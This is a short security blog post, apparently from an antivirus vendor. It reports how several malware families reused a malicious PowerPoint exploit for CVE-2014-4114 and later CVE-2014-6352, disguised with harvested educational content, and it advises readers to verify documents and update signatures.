It's been already a week after the announcement of the CVE-2014-4114 vulnerability, and the tally of the exploiters have only increased.
There are even files where the metadata has remained the same, which clearly shows that they have been copied from the original as in the case of Mirtec and Cueisfry (a trojan linked to Japanese-related APT attacks). Authors behind these malware copied the PowerPoint Document originally used by BlackEnergy and just replaced the payload and the content with legitimate material found online.
Well, if another party's winning formula already worked, there is no need to reinvent the wheel. Until a patch is pushed out, that is. Which brings us to Taleret, a malware family known to be behind certain Taiwanese APT attacks. After CVE-2014-4114 was patched, there was a need to improvise and as such, Taleret this time grabbed a clean PowerPoint and embedded its payload to get it executed via the CVE-2014-6352, a weakness left over from CVE-2014-4114.
Although Microsoft has released a patch for CVE-2014-4114, CVE-2014-6352 has yet to be patched.
It seems that most of the content used by the malicious PowerPoint documents have been harvested from educational institutions or R&D materials that are available in the Internet, thus making it quite challenging to tell them apart.
Here are some examples of both the clean documents and their malicious counterparts:
While, there isn't a patch for the other vulnerability yet, if you couldn't tell which one is clean and malicious, please verify the documents received from the source. Or, you can update your antivirus signatures to check if they are detected.